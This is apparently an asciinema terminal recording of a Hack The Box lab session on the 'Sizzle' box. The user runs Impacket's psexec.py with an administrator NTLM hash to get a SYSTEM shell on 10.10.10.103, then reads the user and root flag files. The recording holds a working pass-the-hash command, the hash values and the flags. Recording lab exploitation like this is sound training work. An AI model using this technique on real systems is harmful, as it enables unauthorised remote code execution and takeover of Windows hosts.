{"version": 2, "width": 119, "height": 37, "timestamp": 1595252905, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.025278, "o", "\u001b[1;32m┌─[\u001b[1;97mroot\u001b[01;32m@\u001b[1;94mkali\u001b[01;33m\u001b[1;32m]─\u001b[1;32m[\u001b[1;97m10.10.14.14\u001b[1;32m]─[\u001b[1;94m~/htb/boxes/Sizzle\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ \u001b[0m\u001b[01;33m$\u001b[0m"]
[1.666214, "o", "psexec.py administrator@10.10.10.103 -hashes 336d863559a3f7e69371a85ad959a675:f6b7160bfc91823792e0ac3a162c9267"]
[2.912191, "o", "\r\n"]
[3.426635, "o", "Impacket v0.9.22.dev1+20200603.152956.fe40cb04 - Copyright 2020 SecureAuth Corporation\r\n\r\n"]
[3.983894, "o", "[*] Requesting shares on 10.10.10.103.....\r\n"]
[4.168436, "o", "[*] Found writable share ADMIN$\r\n"]
[4.193449, "o", "[*] Uploading file zyzDVGCg.exe\r\n"]
[6.385525, "o", "[*] Opening SVCManager on 10.10.10.103.....\r\n"]
[6.955968, "o", "[*] Creating service wUdU on 10.10.10.103.....\r\n"]
[7.395937, "o", "[*] Starting service wUdU.....\r\n"]
[24.022801, "o", "[!] Press help for extra shell commands\r\n\b"]
[25.441526, "o", "Microsoft Windows [Version 10.0.14393]"]
[25.607076, "o", "\r\r\n"]
[26.115333, "o", "(c) 2016 Microsoft Corporation. All rights reserved."]
[26.238797, "o", "\r\r\n"]
[26.445286, "o", "\r\r\n"]
[26.611066, "o", "C:\\Windows\\system32>"]
[27.709324, "o", "p"]
[27.844182, "o", "o"]
[28.107633, "o", "w"]
[28.291785, "o", "e"]
[28.361767, "o", "r"]
[28.565838, "o", "s"]
[28.645457, "o", "h"]
[28.767102, "o", "e"]
[28.97839, "o", "l"]
[29.098947, "o", "l"]
[29.323135, "o", "\r\n"]
[29.441489, "o", "\b"]
[30.198864, "o", "Windows PowerShell \r\r\nCopyright (C) 2016 Microsoft Corporation. All rights reserved."]
[30.491491, "o", "\r\r\n"]
[30.727524, "o", "\r\r\n"]
[30.924019, "o", "PS C:\\Windows\\system32> "]
[32.663052, "o", "gc \\users\\mrlky\\desktop\\user.txt"]
[33.844213, "o", "\r\n"]
[34.005797, "o", "\b"]
[34.006949, "o", "g"]
[34.061412, "o", "c"]
[34.087721, "o", " "]
[34.158194, "o", "\\"]
[34.18136, "o", "u"]
[34.206503, "o", "s"]
[34.232721, "o", "e"]
[34.25723, "o", "r"]
[34.282554, "o", "s"]
[34.312452, "o", "\\"]
[34.339096, "o", "m"]
[34.366814, "o", "r"]
[34.392994, "o", "l"]
[34.843389, "o", "k"]
[35.125137, "o", "y"]
[35.227506, "o", "\\"]
[35.813974, "o", "d"]
[36.189692, "o", "e"]
[36.35982, "o", "s"]
[36.402353, "o", "k"]
[36.444457, "o", "t"]
[36.4697, "o", "o"]
[36.722246, "o", "p"]
[36.748324, "o", "\\"]
[36.773816, "o", "u"]
[36.798941, "o", "s"]
[36.824782, "o", "e"]
[36.850905, "o", "r"]
[36.876221, "o", "."]
[36.901152, "o", "t"]
[37.17915, "o", "x"]
[37.213046, "o", "t"]
[37.262949, "o", "\r"]
[37.300875, "o", "\r\n"]
[37.467577, "o", "a6ca1f8ee9e3bff02e0ed918f9db1310"]
[37.688385, "o", "\r\r\n"]
[37.735334, "o", "PS C:\\Windows\\system32> "]
[40.374878, "o", "gc \\users\\administrator\\desktop\\root.txt\r\n"]
[40.494814, "o", "\b"]
[40.497036, "o", "g"]
[40.52211, "o", "c"]
[40.547892, "o", " "]
[40.703829, "o", "\\"]
[40.732032, "o", "u"]
[40.776139, "o", "s"]
[40.866779, "o", "e"]
[40.892218, "o", "r"]
[40.917032, "o", "s"]
[40.946521, "o", "\\"]
[41.06811, "o", "a"]
[41.093739, "o", "d"]
[41.195128, "o", "m"]
[41.293599, "o", "i"]
[41.319113, "o", "n"]
[41.41055, "o", "i"]
[41.437828, "o", "s"]
[41.463376, "o", "t"]
[41.490584, "o", "r"]
[41.701636, "o", "a"]
[41.727329, "o", "t"]
[41.75569, "o", "o"]
[41.784953, "o", "r"]
[41.815377, "o", "\\"]
[41.841502, "o", "d"]
[41.866419, "o", "e"]
[41.894803, "o", "s"]
[42.25657, "o", "k"]
[42.282448, "o", "t"]
[42.308153, "o", "o"]
[42.503531, "o", "p"]
[42.530746, "o", "\\"]
[42.555824, "o", "r"]
[42.581729, "o", "o"]
[42.607405, "o", "o"]
[42.632815, "o", "t"]
[42.926255, "o", "."]
[43.060281, "o", "t"]
[43.085895, "o", "x"]
[43.220369, "o", "t"]
[43.24735, "o", "\r"]
[43.335068, "o", "\r\n"]
[43.360925, "o", "91c5849357ffe2c87683d3bd6729d72e"]
[43.48128, "o", "\r\r\n"]
[43.507024, "o", "PS C:\\Windows\\system32> "]
[45.012094, "o", "e"]
[45.172114, "o", "x"]
[45.393969, "o", "i"]
[45.48169, "o", "t"]
[45.58311, "o", "\r\n"]
[45.706804, "o", "\b"]
[45.707864, "o", "e"]
[45.733759, "o", "x"]
[45.76304, "o", "i"]
[46.061862, "o", "t"]
[46.144586, "o", "\r"]
[46.169384, "o", "\r\n"]
[46.468285, "o", "\r\r\n"]
[46.574999, "o", "C:\\Windows\\system32>"]
[47.750028, "o", "e"]
[47.91525, "o", "x"]
[48.055553, "o", "i"]
[48.173226, "o", "t"]
[48.268061, "o", "\r\n"]
[48.689433, "o", "\b"]
[48.69392, "o", "[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0\r\n[*] Opening SVCManager on 10.10.10.103.....\r\n"]
[49.448006, "o", "[*] Stopping service wUdU.....\r\n"]
[49.500082, "o", "[*] Removing service wUdU.....\r\n"]
[50.370836, "o", "[*] Removing file zyzDVGCg.exe.....\r\n"]
[56.936493, "o", "\u001b[1;32m┌─[\u001b[1;97mroot\u001b[01;32m@\u001b[1;94mkali\u001b[01;33m\u001b[1;32m]─\u001b[1;32m[\u001b[1;97m10.10.14.14\u001b[1;32m]─[\u001b[1;94m~/htb/boxes/Sizzle\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ \u001b[0m\u001b[01;33m$\u001b[0m"]
[57.866906, "o", "exit\r\n"]
